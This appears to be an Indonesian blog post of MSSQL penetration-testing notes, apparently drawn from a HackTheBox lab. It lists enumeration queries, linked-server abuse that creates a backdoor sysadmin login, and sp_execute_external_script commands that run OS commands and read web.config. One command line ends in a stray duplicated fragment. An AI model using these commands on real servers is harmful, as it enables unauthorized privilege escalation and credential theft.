Post

MSSQL Pentest

Posted Updated
By Nairpaa 1 min read

Login via Linux

1

➜ mssqlclient.py <username>:<password>@<server>

Baca ini untuk meng-upgrade command shell mssqlclient.

MSSQL Basic Command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

# cek versi
SQL> select @@version;

# list username
SQL> SELECT name FROM master..syslogins

# list admin
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';

# cek hak akses user
SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

# list database
SQL> SELECT name FROM master..sysdatabases;

# list tabel
SQL> SELECT * FROM <database>.INFORMATION_SCHEMA.TABLES;

# cek database saat ini
SQL> SELECT DB_NAME();

# cek user saat ini
SQL> select suser_name();

# cek servername saat ini
SQL> select @@servername

# list linked server
SQL> select srvname from sysservers;

# eksekusi perintah di linked server
SQL> EXECUTE ('select @@servername;') at [<srvname>];
SQL> EXECUTE ('select suser_name();') at [<srvname>];
SQL> EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

# bounce back linked server
# dari A ke B ke A lagi
SQL> EXECUTE('EXECUTE(''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];
SQL> EXECUTE('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];
SQL> EXECUTE('EXECUTE(''CREATE LOGIN nairpaa WITH PASSWORD = ''''P@ssword123!'''';'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];
SQL> EXECUTE('EXECUTE(''sp_addsrvrolemember ''''nairpaa'''', ''''sysadmin'''';'') at [COMPATIBILITY\POO_PUBLIC];') at [COMPATIBILITY\POO_CONFIG];TIBILITY\POO_CONFIG];

# read files executing scripts (Python and R)
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
# Open and read a file
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
# Multiline
SQL> EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

Referensi

  • https://0xdf.gitlab.io/2020/06/08/endgame-poo.html#huh
  • https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
Another Hacking, MSSQL
database mssql pentest
This post is licensed under CC BY 4.0 by the author.